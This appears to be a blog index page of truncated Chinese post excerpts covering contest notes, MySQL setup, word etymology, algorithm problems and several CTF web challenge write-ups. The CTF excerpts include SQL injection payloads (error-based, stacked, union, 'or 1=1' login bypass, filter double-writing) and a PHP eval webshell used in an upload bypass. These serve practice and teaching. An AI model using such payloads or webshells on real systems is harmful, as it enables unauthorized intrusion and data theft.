english 2019

时间无情，岁月流逝 ......

组队打 \(\rm ICPC\)，队友是 \(\rm fishead\) 和 \(\rm Liang_Yusong\)。 只过了五个题，还是太菜了。 开局 \(6 \min\) 我先把 \(\rm B\) 切了，然后 \(\rm LYS\) 在 \(34 \min\) 时过了 \(\rm E\)。 ......

1） narrow down the message go through all the details high level review make a quick wrap up it must be case by case 2） Meaning that when the web page ......

安装包下载： https://downloads.mysql.com/archives/community/ 下载mysql-8.0.32-winx64.zip 1、制定目录配置 basedir=D:\\mysql8.0.32#mysql数据存放目录datadir=D:\\mysql8.0.32\\ ......

混沌与宇宙 太初混沌Chaos 大地女神Gaia 地狱深渊之神Tartarus 昏暗之神Ereus 黑夜女神Nyx 爱欲之神Eros 《新约。约翰福音》的开篇这样说：太初有道，道与神同在，道就是神。 Cosmos秩序 秩序和法则 rule universe包罗万象，合众为一 uni- 表示单一,统一 ......

睡梦中的事 黑夜女神Nxy有两个儿子Hypnos&Thanatos Hypnos's cave 睡神的名字Hypnos意思就是睡眠 hypnos >hypno意思也是sleep睡眠 hypno hypnotic催眠的;催眠术的;催眠药 hypnotism催眠术;催眠状态 hypnotist催眠术师 ......

谎言中的谎言 Pseudologoi false speech 说假话; 谎言 pseudo不是一个词根而是一个前缀 pseudoscience伪科学 pseudonymous匿名的；使用假名的 pseudonym假名 pseudomorph假形；假像 pseudodox错误的观点；错误的见解 ps ......

大地之神 Uranus Pontus Ourea Zeus宇斯 冲突与混乱来自于万神之母盖亚。 ​ 《神谱》 Gaia 英语词根geo就与earth相关 geo geography地理学；地形 geographic地理的；地理学的 geometry几何学；几何形状 geometric 几何学的；几何 ......

巨眼如轮 cycle cycle循环、周期；（使）循环、骑自行车 bicycle tricycle unicycle cyclist uncyclopedia cyclone cyclamen circ circle encircle semicircle circular circulate ci ......

看：https://www.cnblogs.com/liming19680104/p/17744270.html 其中的 方法五--VS2019纯汇编 ......

题目打开如下。 经 Fuzzing，发现许多关键词被检测，其中常见的如空格、union、and 都会被检测。 这里使用报错注入出 Flag。 GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,database()),1)) ......

这道题挺好的，可以帮助我更好的理解gadget的利用以及rop技术 首先，查一下程序保护情况 拖进ida分析 这里sys_read和sys_write是系统调用函数，看汇编可以分析出来 我们首先要了解一下64位系统的系统调用 传参方式：首先将系统调用号 传入 rax，然后将参数 从左到右 依次存入 ......

[十二省联考 2019] 字符串问题 题意很唬人，实际上就是让你建出一个二分图模型，然后求点权和最大的路径，其中 \(B_i\) 要向所有满足 \(B_i\) 是 \(A_j\) 的前缀的 \(A_j\) 连边。直接连边是 \(O(n^2)\) 的。考虑优化，不难想到 SA 的优良性质，即 \(B_ ......

题目附件如下。 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title> <form action=\"\" ......

题目给出了源码，如下。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <met ......

[十二省联考 2019] 春节十二响 感觉作为例题还是挺不错的。 感官上直接分析比较困难。不妨先考虑怎样的段长集合是合法的。 注意到合法等价于对每一条从根到叶子的链都合法，考虑在链上贪心，尝试将每个和比他大的最小的点做匹配，如果能匹配上就是合法。很显然，如果仅考虑一条链，那么极小的一个合法段长集合就 ......

打开题目，得到一段源码，如下。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') "wel ......

如何在 Windows Server 2019 中启用 Telnet 客户端这篇文章将介绍如何在 Microsoft 的 Windows Server 2019 中安装 telnet 客户端。 启用 Telnet 客户端首先，我们需要启用 telnet 客户端，如果我们不启用它，我们将在尝试使用它时 ......

相信大家都看过题，但还请搞清楚是数对应结点编号。这里用 \(a_i\) 表示 \(i\) 号结点对应的数。 对于 \(n\leq 10\) 的数据，全排列出删边的顺序然后模拟，取字典序最小的方案。 对于菊花，仍然考虑删边的顺序，假设删边依次是 \(rt\to v_1,rt\to v_2,\cdots ......

考虑一个结点在什么情况下会成为重心。 随便钦定一个根结点。对于结点 \(u\)，假设割掉了其子树 \(v\) 中的某条边或连接 \(u\) 和 \(v\) 的边，形成了一棵大小为 \(k\) 的新树。 令 \(mx\) 表示除 \(v\) 子树外最大的子树大小（或 \(n-siz_u\)）。如果 \ ......

[Cnoi2019] 青染之心 题目描述： Cirno初始有一个空的物品序列，一个大小为 \(V\) 的背包，现在你有 \(q\) 个操作，分为两种： add x y : 表示加入一种体积为 \(x\), 价值为 \(y\) 的物品到序列末尾 erase : 表示删除序列末尾的物品 对于每个操作结束 ......

打开题目，输入：11';show databases;# 后可以发现是堆叠注入。 输入：11';show tables;#。 查看 1919810931114514 表中有什么字段：11';show columns from 1919810931114514;#。 查看 words 表中有什么字段： ......

题目提示如下。 猜测后台语句是设置为仅在用户输入与 flag 完全一致时才输出 flag。 尝试输入：1;show databases;#，发现存在堆叠注入。 输入：1;show tables;#，获取当前存在的数据表。 尝试输入：1;show columns from Flag;#，经过对比，发现 ......

访问靶场，是一个登录框，直接尝试万能密码：admin' or 1=1;# 即可获得 flag。 ......

访问网站如下。 在网页源代码中有提示。 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> Payload：/?cat=dog。 ......

打开题目如下。 直接使用万能密码即可登录，但未拿到 flag。 这里尝试联合注入，首先确定字段数量，Payload：admin' or 1=1 order by 1;#，当字段数为 4 时报错，因此字段数为 3。 接下来判断什么位置的字段会输出：admin' union select 1,2,3;# ......

打开网页如下。 查看页面源代码，发现存在 Secret.php 页面。 <h2>小组简介</h2> <p>·成立时间：2005年3月 ·研究领域：渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术 ·小组的愿望：致力于成为国内实力强劲和拥有广泛影响力的安全研 ......

题目访问如下。 直接使用 antsword 连接即可。 ......

打开题目后发现是一道上传题，如下。 随便上传个 .jpg 结尾的小马上去，提示：NO! HACKER! your file included '<?'。 <?php @eval($_POST['cmd']); ?> 因此使用其他方式替换掉 <?。 <script language="php">@ev ......

打开题目如下。 尝试输入：admin' or 1=1;#，发现 or 被过滤了。 尝试双写绕过：admin' oorr 1=1;#，成功登录。 接下来是与 **[极客大挑战 2019]LoveSQL **类似的，只是多使用了一个双写绕过而已。 ......